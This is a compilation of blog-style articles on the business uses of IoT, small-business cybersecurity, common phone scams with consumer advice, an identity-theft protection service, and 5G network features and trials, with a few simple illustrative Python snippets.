5 Ways the IoT Can Change the Business World

The Internet of Things has started transforming businesses in 2020

The use of cutting-edge technologies like AI, IoT and 5G is no longer unusual in the business world. IoT devices work in a closely connected framework and can be controlled to improve efficiency, which has a direct impact on business productivity: more work gets done in less time. IoT devices record and transfer data to monitor important processes, give us new insights, boost efficiency, and allow companies to make more informed decisions. The resulting gains in productivity and efficiency can increase profits significantly.

Here are some near-future possibilities of the Internet of Things (IoT). This information is based on a survey of 3,000 executives in 12 countries, on the company's own IoT expertise, and on feedback from customers and partners.

– The Internet of Things has gone from being a buzzword to becoming a part of everyday life that any future-oriented business must relate to. It is too late to ask whether IoT has value; in 2019, the question must be how we can make the most of it. This is exactly why we have outlined the business impact of IoT in 2020.

This is what the energy specialist believes are the five most important possibilities of the future IoT:

5 Ways Today’s IoT Will Affect Your Business

1. Mobile Employees

With tomorrow's IoT, we get a new digital wave that connects things to each other over the Internet. This makes us more mobile and more digital than ever. The wave is accelerated by cheaper interconnected sensors, artificial-intelligence devices, faster networks, cloud services and increased capacity for advanced data analysis. With the new wave, the farmer no longer has to be in the barn to check whether the cow is content.

2. Customer Satisfaction and Loyalty

IoT enables us to take advantage of unused data sources to enhance the customer experience. Although many companies are thinking about efficiency and lower costs when considering the value of IoT, access to huge amounts of data and the ability to retrieve real-time information is perhaps most important. IoT can provide even better customer service and new opportunities for customer satisfaction and loyalty. Who would not like a customer center that has the solution ready the moment we get through the telephone queue?

3. Combines Security and Flexibility

An open, compatible and hybrid way of working is the basis for tomorrow's IoT. It requires collaboration on global cyber security standards. In addition, cloud-based IoT will grow, both in popularity and in diversity, across systems. When IoT solutions become available to most people, the solutions will be tailored to both security needs and the tasks to be solved. With a little luck, we can adapt the security to the job and not the other way around.

4. New Sources of Revenue and New Business Models

Just as innovation and development were driven by the industrial revolution, the mobile phone and the internet, IoT will lead to new ways of making money and new business models. Schneider Electric's Energy Operations software and Building Analytics are two good examples of IoT used in property management. Thanks to grid-connected sensors combined with analysis software and assistance from the company's energy advisers, operators can now be notified immediately of system failures and intervene before they cause downtime or energy loss. The data stream from the plants is aggregated into monthly reports that point out specific efficiency measures. The system has been used by NTNU, among others, at Campus Gløshaugen in Trondheim, with excellent results.

Companies, cities and especially developing countries will benefit from IoT solutions, as these solutions are freer and do not have to comply with traditional laws and regulations. According to the consulting firm McKinsey, today’s developing countries account for as much as 40 percent of the market for IoT solutions.

5. Helps the Environment

IoT solutions help address some of our greatest challenges, namely global warming and pollution. In fact, Schneider Electric's report shows that expectations for IoT are highest when it comes to the effect on climate and the environment. Both the public and private sectors are using IoT solutions in the fight against global warming. For example, the University Hospital of Northern Norway has automated Europe's largest patient hotel and delivers world-class energy efficiency.

Still unused potential

Even now in 2019, IoT is delivering great value. Still, there is significant untapped potential. According to Schneider Electric, IoT solutions are most useful in these four areas:

1. Maximize energy efficiency and sustainability through smarter systems and faster decision making. Gigantic Excel sheets are now being replaced by real-time mobile control.

2. Optimized machine and system use as a result of good monitoring and analysis. For example, with critical material and temperature measurement sensors, you can find weaknesses and avoid downtime.

3. Smart, productive and profitable operation through cuts in time and resource use. Real-time analytics let you adjust your operations or production as needs change.

4. Mobile monitoring and reduced risk thanks to simulation and digitalisation. With today's IoT solutions, you can check the factory's machinery from your phone on the couch and be alerted the moment an incident occurs.
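Point 2 above (finding weaknesses with temperature sensors before they cause downtime) can be illustrated with a minimal sketch. The safe range and the readings below are invented for the example, not taken from any real system:

```python
# Illustrative sketch: monitor temperature sensor readings and flag
# values outside a safe operating band before they cause downtime.
# Thresholds and readings are made-up example values.
SAFE_RANGE = (10.0, 75.0)  # assumed safe operating temperatures, in °C

def check_readings(readings: list[float]) -> list[int]:
    """Return the indices of readings that fall outside the safe range."""
    low, high = SAFE_RANGE
    return [i for i, t in enumerate(readings) if not (low <= t <= high)]

readings = [42.0, 55.5, 81.2, 60.1, 8.9]
print(check_readings(readings))  # -> [2, 4]
```

In a real deployment, the flagged readings would feed a monitoring dashboard or a notification service rather than a print statement.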

What risks do IoT security issues pose to businesses?

The threats of the future will be more targeted, and new technology will make attacks easier.

Focus on IT security must increase among SMEs

As the security of large companies has improved, attacks will increasingly target smaller companies. It is not enough to secure only the big players – everyone must become more secure if the country is to become safer, Dficlub concludes.

More targeted attacks

We believe the threats of the future will be more targeted and that new technology will make it easier to attack smaller companies.

Everyone is searching for the starting point of the digital transformation and the road to mature production in the IoT age. Terms like Smart Manufacturing, Industry 4.0, Digital Transformation and the Industrial Internet of Things (IIoT) are becoming more practical and application-based: we are bombarded by new concepts and hype that remind us daily of the rapidly changing world of manufacturing.

Everyone can find an excuse to ignore them, but you can be sure this is not a hype. The world is changing faster than ever, and manufacturers can’t afford to be left behind.

Research firms have studied the industrial software market for several years, and researchers have interviewed hundreds of industrial players. A common theme recurs: to get started, one must find the starting point for the digital transformation. Results show how manufacturing operations management (MOM) systems can be a low-risk and effective starting point for companies that see production as a key part of the digital transformation.

MOM describes how production and operations management can apply business organization and management concepts to the production of goods and services. But a major challenge that IoT-based industries will face is security.

– If you look at blackmail via email, it is a sign that attacks are becoming targeted. The attacks build on the company's internal resources and can, for example, include previously used usernames and passwords to make the attack feel more personal.

Bjarte Malmedal was among the first to receive a master's degree in information security at Gjøvik University College. After his studies, he worked for over 20 years with security management and operational cyber security in the Armed Forces, and was instrumental in establishing and leading the defense cyber security center. The environment was one of the first to work systematically with operational information security in Norway, says Malmedal, who currently works as chief consultant for Experis Cybersecurity.

Security culture and the human factor

– It was a major cultural shift to move from the defense’s operational and technical security efforts to focus on the human factor. The project at NorSIS was to provide a systematic overview of what has been done in the field of security culture in Norway, and was one of the first of its kind in the world. It was therefore a highlight to present the report to the International Telecommunications Union (ITU), a UN body for global standardization in telecommunications, he says.

Malmedal was also responsible for reports on security culture in the energy and water supply sectors, as well as for the youth segment. The project has now collected data for over four years and provides a basis for analyzing trends and changes over time.

Must secure the entire value chain

He says that many are concerned about security culture, but lack a clear picture of what it actually means.

– In the event of data breaches, companies often blame poor security culture, but when you ask what that actually is, you rarely get a clear answer. One must therefore break the term down into attitudes, knowledge and behavior. The report is a guide to assessing the situation in your own organization.

As editor of the government’s new national IT security strategy, which was presented in January, he looked at how the situation is in business, and especially for small and medium-sized businesses.

– Previously, SMEs were not considered important in terms of security. The idea was that the real damage would happen at, for example, Hydro, but the development of the digital economy has made the major players dependent on the security of their subcontractors. If you look at the latest major security incidents, the attacks often come via subcontractors, and today it is understood that the security of the major players depends entirely on the security of the small players, he says.

Must lift the small businesses

He points to a comprehensive lack of IT security expertise among small and medium-sized businesses.

– Smaller companies do not have the money to hire their own people to work with security, but must focus on the core business. If a small business goes to the major security players, they are often offered comprehensive and costly solutions. It is difficult for small businesses to find good security solutions, and we therefore want to help small businesses reach a reasonable level of security.

He refers to a survey conducted by Experis this fall, in which 300 business executives in SMEs were asked about IT security.

– Nine out of ten business executives consider IT security important, but only half responded that they have sufficient expertise in-house. The general attitude is that IT security is important, but the ability to do something about it is lacking.

This is How Phone Phishing Scams Try To Fool You

Mobile and Internet Security: How to Defend Against Attackers

Telephone fraud is definitely not a new phenomenon, but the methods are becoming increasingly sophisticated. We have talked to an expert on how to avoid being fooled.

According to security advisers and investigators at these firms, mobile operators run their own large security operations that block hundreds of thousands of scam attempts every year.

– There is definitely no lack of ingenuity in the fraud industry. In order for the scam business to be profitable over time, they still have to adapt their methods. The attacks are continuously adjusted to the level of knowledge of the potential victims, while the scammers try to circumvent the technical security measures of the telecommunications operators.

The latter is far more difficult than manipulating people, so scam success is largely about how attentive we are when the scammer tries.

It may therefore be wise to know how the scammers operate.

The three most common scams – right now:

1. Local numbers inspire confidence

While we have gradually become more vigilant about calls from unknown foreign numbers, the threshold is significantly lower when it comes to numbers starting with the local country code.

During the summer, the security departments of mobile companies registered that fraudsters have begun to imitate local numbers, with both nine and ten digits after the country code.

On a busy day, you may not notice how many digits the number has. It starts like a normal mobile number, so it seems safe to answer…

They receive daily inquiries from customers who report suspicious experiences with phone calls, text messages and emails from people pretending to be someone else. This is called “spoofing”.

– The scammers have increasingly started to abuse and spoof domestic phone numbers, both real and fabricated, when they contact residents of that country.

If your number gets spoofed, it is important to know that neither your mobile nor your number has been hacked. The scammers use software that lets them pretend to call from a number that is not theirs. This also makes it very difficult for the person being contacted to detect the fraud before answering.

– It costs nothing to answer, but the potential for loss lies in what happens afterwards. The scammers will then gladly try to trick you out of personal information and card details.

Expert’s advice:

If you find that someone has misused your number, contact your mobile provider; they can often help you, for example by blocking foreign calls from your number. Note that this also means you cannot call your home country from abroad, e.g. while on vacation. The vast majority of smartphones can also block numbers that are bothersome or unwanted. And if you do not recognize the local number calling you, spend a few seconds checking the number of digits before answering.
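The last piece of advice, checking the number of digits, can be sketched in a few lines of code. The numbering-plan lengths below are assumptions for illustration only; a real implementation would consult an authoritative numbering-plan database.

```python
# Minimal sketch: flag caller IDs whose digit count does not match the
# national numbering plan for their country code. The lengths below are
# assumed example values, not authoritative data.
EXPECTED_DIGITS = {"+47": 8, "+46": 9}  # country code -> national number length

def looks_suspicious(caller_id: str) -> bool:
    """Return True if the number's length does not fit its country code."""
    for code, length in EXPECTED_DIGITS.items():
        if caller_id.startswith(code):
            national = caller_id[len(code):]
            return not (national.isdigit() and len(national) == length)
    return True  # unknown country code: treat as suspicious

print(looks_suspicious("+4791234567"))   # 8 digits after +47 -> False
print(looks_suspicious("+47912345678"))  # 9 digits after +47 -> True
```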

2. “Microsoft Scams”

This is a classic example of "phishing", where the scammer "fishes" for your personal information. By gaining access to your PC, the scammer tries to get you to download malware, pay for antivirus software you don't need – and capture both card numbers and login details for, for example, online banking.

Mobile operators prevent and handle fraud attempts every day.

Here are tips:

– If you experience or suspect fraud attempts via calls or SMS, you can notify your mobile operator. They can block unwanted international calls before they are forwarded to specific mobile subscriptions.

Expert’s advice:

Neither Microsoft nor any other operating system vendor will contact you to request software downloads or provide sensitive information in this way. Therefore, in order to reveal this fraudulent method, it is important that as many people as possible know how it works. Knowledge is the most effective defense!

3. Interrupted calls pique curiosity

Have you ever been called from an unknown foreign phone number that only lets it ring once or twice before going silent? Then you may have been exposed to a scam called "wangiri". The word is Japanese and means that the call ends after just one ring.

The point is that you should not be able to answer, but be sufficiently curious to call back. It is only when you call back that the scam starts – the number you call back is an international high-tariff number with a high minute price.

As many as 10 percent of those who receive a "wangiri" call actually call the missed number back, so this is a very simple and profitable form of fraud.

– The international scammers use a so-called call generator to call several thousand subscribers a day at once. Remember that the meter starts running even if you do not hear anyone answer at the other end, and in some cases it can get expensive, warns the security expert.

Expert’s advice:

Be aware of which numbers you call back. If you do not recognize the number, or do not expect to receive a call from the country in question, you should not call back – no matter how curious you are.

You can’t stop all the threats yourself
The difference between scams and other types of digital threats is that you can often prevent the scams yourself, while you need help to stop or limit everything else that can happen.

Therefore, mobile operators offer a number of security services that make digital life safer. One of these is Secure ID, a fraud-prevention service that helps you in the event of ID theft. You will be notified immediately on your mobile if your personal data has gone astray, and you will be assisted in the event of any abuse.

A safer everyday life with Secure ID:

Have you ever worried about your personal data being abused or disseminated by others? If you have Secure ID, you will be notified as soon as your personal information turns up where it should not, and you will be assisted in the event of abuse.

Secure ID means extra security for you – and the family!

How does Secure ID work?
Secure ID consists of three elements: ID monitoring, ID theft insurance and Internet erasure. Note that ID theft insurance starts automatically when you order, while ID monitoring must be activated by registering at least one email address. To make use of Internet erasure, you must first create a case.

ID monitoring
The first step in reducing the risk of ID theft is ID monitoring. Most people use their email addresses as usernames on multiple websites. With ID monitoring, you are notified if the Secure ID system finds your email address and login details in an unsafe place on the web. To be notified, you must first register which email addresses to monitor.

  • You can register up to 5 email addresses
  • The email addresses must be verified via email
  • Once registered, you will be notified if the email (often a username/password pair) is for sale or being misused online
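The idea behind ID monitoring can be modelled roughly as a set comparison between the addresses you registered and addresses found in leaked credential dumps. The real Secure ID service is not public, so this is only a conceptual sketch with made-up data:

```python
# Conceptual sketch of ID monitoring: alert when a monitored address
# appears in breach data. Both sets below are invented example data.
monitored = {"anna@example.com", "ola@example.com"}   # user-registered addresses
leaked = {"ola@example.com", "kari@example.com"}      # assumed breach dump

alerts = sorted(monitored & leaked)  # addresses that appear in both sets
for address in alerts:
    print(f"ALERT: {address} found in a breach dump")
```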

ID theft insurance
Ensures you get help if you have been exposed to ID theft, with legal assistance and financial compensation for abuse and fraud. You also get help if someone has created a false profile with your information.

The ID theft insurance covers yourself, spouse / cohabitant and all children under the age of 20 living at the same address.

With Internet erasure, you get help removing unwanted content online. This applies both to things written about you and to private images that have gone astray. You get legal assistance and a contact person who takes on the job of deleting photos and comments for you. You will also receive financial compensation for psychologist assistance and lost salary income if needed.

How to prevent data from spreading online

By using ID monitoring and responding to any alerts you receive, you can react quickly and reduce the risk of someone misusing your data if it is spread on the internet.
You are probably registered with several online services where you use your email address to log in. Security breaches in these services can cause your information to be disseminated online. If ID monitoring detects such breaches, your information may be being misused by unauthorized persons.

Useful tips and advice – some simple precautions to follow online

  • Use different passwords on different services and change passwords frequently
  • Never share your personal data
  • Never email bank / credit card details
  • Never shop at online stores that do not have secure payment
  • Lock your mailbox if possible
  • Do not click links in emails from unknown senders; type the address into the browser yourself
  • Keep track of transactions in your bank account
  • Delete content on your mobile, PC or Mac before discarding or delivering it
  • Be careful
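The first tip, using a different password for every service, is exactly what a password manager automates. As a rough illustration of the idea, a unique random password per service could be generated like this (a sketch, not a replacement for a proper password manager):

```python
import secrets
import string

# Sketch of the "different passwords per service" advice: generate a
# random, unique password per account using the cryptographically
# secure `secrets` module.
ALPHABET = string.ascii_letters + string.digits + "!#%&*+-_"

def generate_password(length: int = 16) -> str:
    """Return a random password of the given length."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

for service in ("webshop", "email", "bank"):
    print(service, generate_password())
```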
5 Reasons Why 5G is The Future

5 Reasons to Look Forward to 5G

The next generation mobile network is more than “just” crazy speeds …

We are approaching a society where everything and everyone is connected through the internet – at tremendous speeds, thanks to the 5G network.

Many mobile operators recently opened 5G pilots in limited areas, and are thus well on track ahead of next year's large-scale rollout of the super network of the future.

And there are several reasons to rejoice. Here are five of them …

1. Huge speeds
Let it be said first of all: 5G will offer incredible speeds.

– Year after year, data usage grows by between 50 and 100 percent. 5G will enable much more data to be transported than today's 4G network, and is therefore far better equipped to cope with our increasingly advanced data usage.

According to recent 5G test results, we will notice this especially when streaming or using entertainment services:

– Gaming on 5G will go like a dream, with speeds at the level of fiber.

The fact that there is hardly any latency to speak of in the 5G network is also something that will delight many online gamers.

2. Network slicing
Network slices are separate networks built on top of the underlying mobile network. In practice, this means that, for example, health services, industrial areas and zones for autonomous vehicles will each have their own customized network – but on the same mobile network.

– 5G will be so good that companies can have their own data connection configurations tailored to the individual business. The mobile network no longer becomes “one size fits all”.

3. Guaranteed quality of service
With 5G, it is possible to offer guaranteed service quality, or Quality of Service (QoS).

For example, many players, including Telenor, are working to facilitate self-driving, autonomous vehicles. When these roll out on Norwegian roads, it is crucial that they always have a secure, stable and fast connection through the mobile network.

– Imagine a surgeon performing a remote operation using a robot. It will require extremely fast response time from the network, but with 5G this will be possible.

In short, the time it takes for large amounts of data to be sent back and forth in the 5G network will be close to zero, which opens up an enormous number of opportunities that depend on real-time data – something that is not possible today over the 4G network.

4. “IoT” – everything is connected to everything
You may have heard the term before? The Internet of Things, or the Industrial Internet of Things, has been talked about for a while now. Simply imagine billions of devices, sensors, machines and things connected to the Internet at any given time.

Admittedly, this is also being rolled out in today’s 4G network, but the 5G network will have the capacity to handle even more devices.

– Every Sunday when I cook in the oven, I think how nice it would be to be able to sit on the sofa and control the temperature in the oven and have a complete overview of the cooking.

With the 5G network we will see that more and more things are connected to the network, which can give us a more efficient and comfortable everyday life.

5. Full use of VR and AR

Because of the huge amount of data virtual reality equipment requires, many believe that 5G will be able to bring out the full potential of the technology – as data can be sent back and forth between the screens and a real-time server. The same applies to so-called augmented reality (shortened to “AR”).

VR is technology that shuts out the outside world and lets you move around in an artificial reality. With AR, you can add digital elements to the reality we actually live in.

The popular game Pokémon Go is perhaps the best-known example of AR technology. As the technology advances, you could, for example, get traffic info in a corner of the windshield as you drive home from work, while you and the kids build complicated Minecraft structures in the park using your own sets of AR glasses.

– Many believe that glasses that can do all sorts of things will become a reality.

You must know these 5G terminologies:

Network Slicing: The mobile network can be divided into separate networks that work independently of one another

QoS: “Quality of Service”, security against outages, errors and delays

IoT: “Internet of Things”, billions of devices are connected to the web

VR: “Virtual Reality”, technology that encloses the user in an artificial reality

AR: Augmented Reality — augmented reality, adds digital elements to the real world

IoMT: "Internet of Medical Things", billions of medical devices are connected to the web

IIoT: "Industrial Internet of Things", billions of industrial devices are connected to the web

Evolution of 5G in Internet of Medical Things (IoMT)

Role of 5G in Medical Health: First Test Case

Norway's first private individual to connect to a 5G mobile network works at the Emergency Medical Communication Center (AMK) Inland. He knows that good coverage can mean the difference between life and death. This is Europe's first use case of 5G applications in healthcare.

He has truly experienced the importance of a functioning 5G mobile network. He has tried everything a mobile can do and clearly notices the difference from the 4G (LTE) mobile network.

“I notice that there is better sound and much faster network. Whether I’m streaming movies or sending video clips.”

According to him, every day shows how important a properly functioning network is when people need help and must be reached. With a functioning 5G network, you can send patients' ECG measurements to the hospital faster, and you can film car wrecks to give an impression of the extent of damage after a traffic accident.
It can also be easier to find people who have lost their way in the mountains, he said.

This is just the start of the evolution of 5G in the Internet of Medical Things (IoMT).

This is 5G

The hyper-connected society enabled by revolutionary 5G technology will soon be a reality. It means a huge number of things connected to the web, high speeds, minimal delays, increased reliability and brand-new possibilities for using the web.

What is 5G?

We have been developing mobile networks with new generations about every ten years since analogue NMT (1G) came in 1981, 2G in 1992, 3G in 2001 and 4G in 2010. Around 2020 comes 5G.

5G will provide us with two main types of communication solutions: The first provides us with a higher capacity mobile broadband network and enhanced user experiences. The second major type provides a 5G network that will enable special networking solutions for many different purposes with different functionality requirements. It will be designed for billions of things connected to the web, for very fast response times, and for increased security and reliability.

The big difference between the 5G network and previous generations is that 5G is designed to provide networks and services to various industrial and community-driven equipment units, as well as services and networks for the smartphone.

How would you like to experience 5G?

In addition to mobile broadband, 5G will be offered as fixed broadband access to households and businesses in areas without fiber networks. It will also be arranged for broadcasting of radio and TV. The emergency services will have their own secure and effective solutions for emergency situations, including coordination of communication with audio, video, maps, positioning, first aid, drone management, etc. Companies, government agencies and households will be able to create their own "private" networks of sensors and machines that can be monitored and controlled via the network. Vehicles will be connected and coordinated for safer and more efficient traffic management. In the health sector, 5G could be used for telemedicine to diagnose and treat patients where they are. In the energy sector, 5G can be used to measure and control production, distribution and consumption in more environmentally friendly and cost-effective ways. In the food industry, 5G will enable more efficient and environmentally friendly production and distribution with sensors that monitor and quality-assure the entire food chain from sea, field and barn to the dinner table.

5G is expected to be a driver in the digital transformation of the ICT community of the future, for example, with sensor and communication solutions for smart cities, autonomous transport solutions and emergency networks. Individuals will experience new and improved digital services on their smartphone delivered over 5G. These services will be much faster, more accessible and more secure than today’s services. Individuals will also benefit from sensor and communication solutions for smart cities, autonomous transport solutions and emergency networks. Other 5G services will utilize the available speed and enhanced security for the transmission of virtual or customized reality, such as to “ambulance hospitals” or “firefighter support systems”.

When will 5G be available?

From the start, 5G will be gradually built on top of the 4G network. 5G technology is standardized in two phases, in 2018 and 2019 with international approval in 2020/21, but it is difficult to determine when 5G becomes widely available.

5G is under development and being piloted in Europe, Asia and the USA, starting with pilots that tested, among other things, self-driving buses in 2018. During the Olympics in South Korea, 360-degree TV services and 5G-based robots were tested, among other things. Commercial deployment is expected to start in 2020 as needed, but it will not be a massive rollout like we saw for 3G and 4G. In the coming years, international research and innovation within 5G will focus on evaluating 5G KPIs ("key performance indicators") and piloting solutions for different applications in different industries.

What is unique about 5G?

5G will come with a host of new and unique features compared to the 4G network we have become used to. Three important examples of areas that will benefit from 5G, so-called industrial verticals, are autonomous transport solutions, the energy sector and the media industry. One conceivable transport solution is the interconnection of cars ("platooning"), with communication between the cars and from the cars to the network, which requires extremely low delay and strong robustness. This will allow cars and traffic signals to be synchronized for optimal driving speed and density of cars in all conditions.

For the energy sector, however, a massive IoT system with large amounts of sensors that constantly provide new information and data for monitoring, control and big data analysis can be critical.

In the media world, consumers may want to have access to a 5G network at extreme speeds, enabling high quality streaming in real time, preferably with an AR experience as well.

In particular, five features of 5G offer great potential for new applications, helping to propel the hyper-connected community and enable much of the revolutionary technology we hear about otherwise:

Network slicing

5G enables operation of a more flexible and programmable network. This is made possible by new technology for logical network slices. Various logical networks will be created on top of this extremely flexible infrastructure, delivering networking infrastructure as varied as the applications require. In practice, this means that services with very different needs – such as health services, industrial areas and zones for autonomous vehicles – each experience having their own network within the same physical network, tailored to their needs and without being at the expense of each other.

Robustness and quality guarantees

This network slicing also offers guaranteed quality of service (QoS) for various industries, services and uses – which is especially important for critical functions (such as health and emergency services, transport and industrial production), and also makes it safer to become more digital. It ensures a robustness in the network that enables services with zero tolerance for outages, errors and delays to use internet-based services and systems in a whole new way.

Extremely low delays

5G will offer much lower delays in the network than before, with some estimates down to 1 ms; in a 4G network, the delay is about 25 ms. As mentioned above, this will be especially important for self-driving cars, which can then communicate for both safer and more efficient transport: when a car knows the instant the car in front brakes, it is both protected against a potential collision and able to avoid queuing through synchronized movement. In healthcare, too, low delays can be essential, for example in remote-controlled robotic surgery, where you want near-perfect response between the machine and patient in one hospital and the doctor controlling the operation from another. 5G offers ultra-reliability at these latencies, known as uRLLC (ultra Reliable Low Latency Communication).
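To make the 25 ms versus 1 ms difference concrete, consider how far a vehicle travels before a network message even arrives. This is a simple illustrative calculation, not a figure from the article:

```python
def distance_during_latency(speed_kmh: float, latency_ms: float) -> float:
    """Metres a vehicle travels before a network message arrives."""
    speed_ms = speed_kmh / 3.6          # convert km/h to m/s
    return speed_ms * (latency_ms / 1000.0)

# At highway speed (108 km/h = 30 m/s):
print(round(distance_during_latency(108, 25), 3))  # 0.75 m on a ~25 ms 4G link
print(round(distance_during_latency(108, 1), 3))   # 0.03 m on a ~1 ms 5G link
```

At highway speed, a platooning car travels three quarters of a metre blind on a 4G link but only a few centimetres on a 5G link, which is why the latency figure, not the headline speed, drives the automotive use-cases.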

Massive machine type communication (mMTC)

5G technology will also make it possible to have a massive number of things connected to the network, known as massive machine type communication (mMTC).
We already see that most people have a smartphone, but the great growth in connections is sensors, machines and things connected to the internet: the so-called Internet of Things (IoT). These things have very different needs: some exchange tiny amounts of data and must ensure long battery life (like a parking sensor buried in the tarmac), while others, like a self-driving car, have plenty of power but must transfer large amounts of data to the cloud. For all the technology now expected within the broad IoT concept to be implemented, the network must handle massive volumes of things at once. 5G delivers this, supporting one million connected things per square kilometer on the same network.
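The one-million-devices-per-square-kilometer target can be put in perspective with a quick calculation of how many devices a single cell would have to support, assuming an idealized circular coverage area:

```python
import math

DEVICES_PER_KM2 = 1_000_000  # 5G mMTC design target

def devices_in_cell(radius_km: float) -> int:
    """Devices a single circular cell must support at the mMTC target density."""
    area_km2 = math.pi * radius_km ** 2
    return int(area_km2 * DEVICES_PER_KM2)

print(devices_in_cell(0.5))  # a 500 m cell: about 785,000 devices
```

Even a small urban cell must therefore be able to register and schedule hundreds of thousands of devices, which is why mMTC is a distinct design goal rather than a side effect of higher speeds.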

High speeds

The least radical change from 4G to 5G, but still noteworthy, is the evolution in network speed. This is not only necessary to meet the strong growth in data traffic we already see, where more and more content requires large amounts of data (for example, more and more people streaming 4K-quality video). It also means that completely new uses emerge. Far more advanced functions and operations can run in the “cloud” because data is transmitted quickly through the network and does not need to be stored or processed locally. This allows mobile devices to become more advanced and do more demanding things than we are used to. The high speeds will also be a driver for faster development of so-called augmented reality.

Some of these features may also be fully or partially incorporated into the constantly evolving 4G network (so-called 4.5G). This means they will be available even where there is no 5G coverage and you still rely on 4G. There is therefore constant development of the 4G network as well, which will help drive the digitization of society. 5G will enable entirely new uses for the technologies we already have, and will be needed to exploit the technologies we expect to come. The practical consequence is that if we are to take advantage of all the opportunities new technology gives us, we depend on a better digital infrastructure than today's. That is why 5G is about far more than just building a new network.

From one G to another

We are now approaching the fifth generation of mobile networks. Roughly speaking, there has been a generational shift about every ten years. Why? Because each “G” in a sense has an expiration date. Not like food, which you know will go bad; rather, technology in society evolves in ways the existing network cannot keep up with serving. For example, 3G opened up mobile data, but was not built for the revolution in data traffic and mobile applications that the iPhone's arrival in 2007 set off. It was 4G, designed as a dedicated data network, that made smartphones shine. The shifts are not driven by needs alone, but also by what can be offered: networking technology is constantly improving, and then new standards are needed.

Thus, a “G” is not a single technological solution, but a standard consisting of a number of technologies, describing, among other things, how good a network should be and how it should be built.

The dynamics are simple: we need more, and we can offer more. That is what drives the race toward 5G.

The Technology of The Year 2020 Will Be 5G



What can 5G technology do? What can we do with 5G technology? Why do we need a 5G network?

These are among the most common questions we receive from around the world. Let's see how this game-changing, cutting-edge technology, 5G, is going to change our lives from 2020 onward.

Even after LTE, progress does not stand still: people demand high-speed internet access, and thanks to IoT, more and more equipment “wants” to connect to the global network. How do we solve both problems at once?

From time to time, the media delights us with news of the upcoming 5G era, and customers are enticed by the claimed high-speed access. The Next Generation Mobile Networks Alliance (NGMN, an association of mobile operators, suppliers, manufacturers and research institutes) defines the following requirements:

  • Data transfer speeds of tens of Mbps for tens of thousands of users simultaneously.
  • Data transfer rates of 100 Mbps in megacities.
  • Data transfer rates of 1 Gbit/s simultaneously for many users on the same floor.
  • Connection of hundreds of thousands of wireless sensors simultaneously.
  • Higher spectral efficiency compared to 4G.
  • Improved coverage.
  • Improved signal transmission efficiency.
  • Significantly lower latency compared to LTE.
  • Operation in the frequency spectrum approved by the FCC on July 14, 2016, which includes 28 GHz, 37 GHz and 39 GHz.
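The first two NGMN figures can be combined into a rough order-of-magnitude check of what a dense deployment must carry in aggregate. The user count and per-user rate below are assumed midpoints of the quoted ranges, not NGMN numbers:

```python
# Order-of-magnitude sketch: tens of thousands of users at tens of Mbps
# implies aggregate capacity in the hundreds of Gbps for the served area.
users = 10_000          # "tens of thousands of users" (assumed value)
per_user_mbps = 50      # "tens of Mbps" (assumed value)
aggregate_gbps = users * per_user_mbps / 1000
print(aggregate_gbps)   # 500.0 Gbps of aggregate capacity
```

Numbers like these explain why the requirements list pairs speed targets with spectral-efficiency and high-frequency spectrum items: the aggregate load cannot be met in today's cellular bands alone.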

It is worth noting that 5G so far exists only in the form of the Release 15 specifications and in periodic performance tests, as in Japan.

Japan Tests 5G:
Japanese mobile operator NTT docomo has built a 5G network capable of broadcasting 8K video for VR glasses.

Many of us are just starting to master 4K images, but technology continues to evolve, and 8K resolution will be next for large screens. For reference, an 8K screen contains the pixel count of four 4K screens (8192 × 5120, aspect ratio 16:10, 41.9 megapixels).

The broadcast system allows you to broadcast high-resolution VR content from anywhere using 5G networks. The solution consists of an 8K 3D camera with the ability to record 360 degree video, a Yamaha spherical 3D microphone with 64 audio channels, several data processing servers and a 5G base station. Note that the 3D camera broadcasts 9 videos in 4K at the same time. It is proposed to use Oculus Quest as client equipment.

To achieve this, given the requirements for processing the video and audio streams and the available bandwidth, NTT Docomo used a new 8K, 60 fps video encoder to limit the load.

Several real-time data processing servers convert 9 video streams of 4K 3D cameras into 2 streams with 8K resolution in 3D format with a 360-degree panorama. Another server converts 64 sound channels of a 3D microphone into 36 channels of 3D sound. Then all this is compressed and synchronized for streaming over 5G.

Virtual reality technology is still maturing. Its slow development is driven not only by demanding hardware requirements but also by the bulkiness of the devices themselves. Under such conditions it is difficult to talk about mobility, because no one wants to be “chained” to a PC with wires or constantly hunting for a strong Wi-Fi signal.

UK 5G Public Testing
Great news from Vodafone: Manchester Airport has launched a public access test using 5G technology. For this purpose, the telecom operator placed a portable Gigacube router (Figure 2) using Massive MIMO technology in the airport terminal. Its characteristic feature is the use of multi-element digital antenna arrays; put simply, user terminals will always be much smaller than base-station antennas.

Vodafone also uses a 5G Blast Pod. Via Wi-Fi, it lets visitors get a feel for 5G using their existing devices, with free access to the NOW TV service. As an example, visitors can download an episode of the recent series Tin Star in 45 seconds, and the entire series in about 6 minutes; on a 4G network, this would take more than 26 minutes.
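Those download times imply a throughput gap that is easy to sanity-check. The sketch below assumes a hypothetical 5 GB series and illustrative rates of 150 Mbps for the 5G test and 25 Mbps for 4G; none of these figures come from Vodafone:

```python
def download_time_s(size_gb: float, speed_mbps: float) -> float:
    """Seconds to download size_gb gigabytes at speed_mbps megabits per second."""
    size_megabits = size_gb * 8000      # 1 GB = 8000 megabits (decimal units)
    return size_megabits / speed_mbps

# Hypothetical 5 GB series at assumed 5G-test vs 4G rates:
print(round(download_time_s(5, 150)))  # ~267 s, about 4.5 minutes
print(round(download_time_s(5, 25)))   # 1600 s, about 27 minutes
```

With these assumed numbers the calculation lands close to the quoted 6-minute and 26-minute figures, which suggests the demo was running at a test rate only a few times faster than good 4G, far below 5G's theoretical peak.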

Vodafone plans to expand to other major airports and train stations across the UK.

US 5G Prospects and Promises
T-Mobile, in its blog, declares a fight against the cable monopoly and claims it will be able to create an alternative to classic broadband access even in rural areas.

The motivation is an FCC report which says that 28.9% of urban private homes and 61.1% of rural private homes are connected to only one service provider or have no Internet access at all; high-speed access is even scarcer. The report details that 45% of private houses in cities and 76% in rural areas either lack high-speed access or are served by only one operator.

According to the business plan, by 2024 T-Mobile is going to connect more than 9.5 million subscribers to the broadband access services using 5G means.

In the near future, the company plans to begin installing 4G wireless routers operating on T-Mobile's LTE network. Under this pilot project, called Home Internet, users get the T-Mobile In Home router for free; the user simply unpacks the equipment and plugs it in. Later, the router is to be upgraded to the 2.5 GHz frequency spectrum and the ability to work on 5G networks.

What about 5G in Russia?
